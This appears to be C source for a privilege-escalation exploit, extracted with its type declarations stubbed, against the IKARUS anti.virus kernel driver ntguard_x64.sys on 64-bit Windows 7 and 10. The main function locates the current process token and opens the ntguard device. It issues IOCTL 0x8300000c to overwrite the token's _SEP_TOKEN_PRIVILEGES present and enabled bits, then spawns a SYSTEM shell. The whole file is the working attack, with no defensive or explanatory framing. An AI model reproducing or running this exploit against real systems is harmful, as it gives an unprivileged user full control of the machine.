
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int QWORD ;
typedef int LPVOID ;
typedef scalar_t__ HANDLE ;
typedef int DWORD ;


 int CloseHandle (scalar_t__) ;
 scalar_t__ CreateFile (char*,int,int,int *,int ,int ,int *) ;
 int DeviceIoControl (scalar_t__,int,int *,int ,int ,int ,int *,int *) ;
 int FILE_SHARE_READ ;
 int FILE_SHARE_WRITE ;
 int GENERIC_READ ;
 int GENERIC_WRITE ;
 int GetCurrentProcess () ;
 int GetCurrentProcessId () ;
 scalar_t__ INVALID_HANDLE_VALUE ;
 int MAX_PATH ;
 int OPEN_EXISTING ;
 int TokenAddressCurrentProcess (int ,int ) ;
 int getch () ;
 int printf (char*,...) ;
 int spawnShell () ;
 int sprintf (char*,char*,char*) ;

int main(int argc, char *argv[])
{

    QWORD TokenAddressTarget;
    QWORD SepPrivilegesOffset = 0x40;
    QWORD PresentByteOffset;
    QWORD EnableByteOffset;
    QWORD TokenAddress;
    HANDLE hDevice;
    char devhandle[MAX_PATH];
    DWORD dwRetBytes = 0;


    printf("-------------------------------------------------------------------------------\n");
    printf("        IKARUS anti.virus (ntguard_x64.sys) Arbitrary Write EoP Exploit        \n");
    printf("                 Tested on 64bit Windows 7 / Windows 10 (1709)                 \n");
    printf("-------------------------------------------------------------------------------\n");

    TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
    printf("\n[i] Address of current process token 0x%p", TokenAddress);

    TokenAddressTarget = TokenAddress + SepPrivilegesOffset;
    printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten\n", TokenAddressTarget);

    PresentByteOffset = TokenAddressTarget + 0x2;
    printf("[i] Present bits at 0x%p will be overwritten with 0x11\n", PresentByteOffset);

    EnableByteOffset = TokenAddressTarget + 0xa;
    printf("[i] Enabled bits at 0x%p will be overwritten with 0x11", EnableByteOffset);

    sprintf(devhandle, "\\\\.\\%s", "ntguard");

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, ((void*)0), OPEN_EXISTING , 0, ((void*)0));

    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Open %s device failed\n\n", devhandle);
        return -1;
    }
    else
    {
        printf("\n[+] Open %s device successful", devhandle);
    }

    printf("\n[~] Press any key to continue . . .\n");
    getch();

    DeviceIoControl(hDevice, 0x8300000c, ((void*)0), 0, (LPVOID)PresentByteOffset, 0, &dwRetBytes, ((void*)0));
    DeviceIoControl(hDevice, 0x8300000c, ((void*)0), 0, (LPVOID)EnableByteOffset, 0, &dwRetBytes, ((void*)0));

    printf("[+] Overwritten _SEP_TOKEN_PRIVILEGES bits\n");
    CloseHandle(hDevice);

    printf("[*] Spawning SYSTEM Shell");
    spawnShell();

    return 0;
}
